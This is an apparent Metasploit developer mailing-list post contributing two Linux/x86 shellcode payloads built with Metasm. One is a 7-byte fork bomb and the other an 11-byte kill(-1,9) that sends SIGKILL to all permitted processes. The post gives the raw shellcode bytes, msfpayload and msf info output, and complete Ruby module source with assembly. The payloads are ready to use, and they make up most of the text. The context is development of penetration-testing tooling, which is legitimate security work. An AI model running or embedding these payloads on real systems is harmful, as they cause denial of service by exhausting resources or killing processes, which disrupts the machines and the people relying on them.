-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hey guys,
I just started playing around with Metasm earlier today (it's great!), and
drew up a couple of simple Linux/x86 payloads to test some of it out a bit.
I don't think these are really of interest for inclusion, but you're of course
welcome to them if they are. I figure sending them can't hurt anything.
The first is a fork bomb in 7 bytes, and the other is kill(-1,9) in 11 bytes.
These are some things I did when I first started playing with shellcode:
http://www.milw0rm.com/shellcode/2805
http://www.milw0rm.com/shellcode/3446
And as you can see they're the same:
$ ./msfpayload linux/x86/forkbomb y
# linux/x86/forkbomb - 7 bytes
# http://www.metasploit.com
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, PrependSetreuid=false
"\x6a\x02\x58\xcd\x80\xeb\xf9"
$ ./msfpayload linux/x86/killall y
# linux/x86/killall - 11 bytes
# http://www.metasploit.com
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, PrependSetreuid=false
"\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80"
Quite cool.
msf > info linux/x86/forkbomb
Name: Linux Fork Bomb (Metasm)
Version: 1
Platform: Linux
Arch: x86
Needs Admin: No
Total size: 40
Provided by:
Kris Katterjohn <[EMAIL PROTECTED]>
Description:
This payload launches a fork bomb, i.e. 'for (;;) fork()'
msf > info linux/x86/killall
Name: Linux Kill All Processes (Metasm)
Version: 1
Platform: Linux
Arch: x86
Needs Admin: No
Total size: 44
Provided by:
Kris Katterjohn <[EMAIL PROTECTED]>
Description:
This payload sends SIGKILL to all of the processes we are permitted
to send to via kill(-1, 9)
Thanks,
Kris Katterjohn
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iQIVAwUBSOwK+P9K37xXYl36AQJtRBAAg3Cj6s74kIo5omriszgnB2nKmckfgqrL
tGexyRkSAMrTEFsaCmULb/r88Un/mVFNn6elOtnp7CG1Py7BpMUO0hniVIIp6cbI
7zvsnu4R9aKyBiXzL9BqSwu9aw7AU/qcdzhsufYzi2C3WAbHsr2Ki9pHKWZUst8a
GfHZjp7NDnRgEOF3dacWdc+J4gwFMnmyee/SxwWdvTawWbFaOQguaCb6ajPmn9oa
728pTSMPshby0W0LspXLxHEmfQ3pAhAfPYmLX29L0zFk45x3LqIp0opMxaeIRIHI
3eCQmiLQTVffss276xJ3VhVpfPxzvR1SzhdMxvdK0qdxfLESelFhE1toV92fySDy
vM8gIxpXXPrcm3gBcC1u+y6pule7RvIkmphlaIrZK7j7KLaMHLXV84E8YVkeIoH1
rXal5R3eMmL/xOecFAFnKz37vVSpjDj7DaCs3PThGzThf/bRDjdkQmkwcdeZlMLI
+7vlmw8BGHqr7S93+l6dWriLLomg+jYYWkOzi//soRs58T/94oPB53BOSbIVaIQN
Qlg69nprC0mq41ARYAfxgLK6Ja5lCkHK9AyT5MWOKlOIuOoUfMSSr4N3GAX69pgW
Mx7KaLfPc4ssYhrxDuphVn3OqXhjHO3/xzSRUf0cmURttpmd7hD7w8akje5fDmhB
9OtnXc1uOlo=
=1gYi
-----END PGP SIGNATURE-----
require 'msf/core'
require 'metasm'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Fork Bomb (Metasm)',
'Version' => '1',
'Description' => %q{
This payload launches a fork bomb,
i.e. 'for (;;) fork()'
},
'Author' => 'Kris Katterjohn <[EMAIL PROTECTED]>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' => {},
'Assembly' => <<EOA
; http://milw0rm.com/shellcode/2805
_start:
push 2
pop eax
int 0x80
jmp _start
EOA
}
))
end
end
require 'msf/core'
require 'metasm'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Kill All Processes (Metasm)',
'Version' => '1',
'Description' => %q{
This payload sends SIGKILL to all of the
processes
we are permitted to send to via kill(-1, 9)
},
'Author' => 'Kris Katterjohn <[EMAIL PROTECTED]>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' => {},
'Assembly' => <<EOA
; http://milw0rm.com/shellcode/3446
push 37
pop eax
push -1
pop ebx
push 9
pop ecx
int 0x80
EOA
}
))
end
end
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
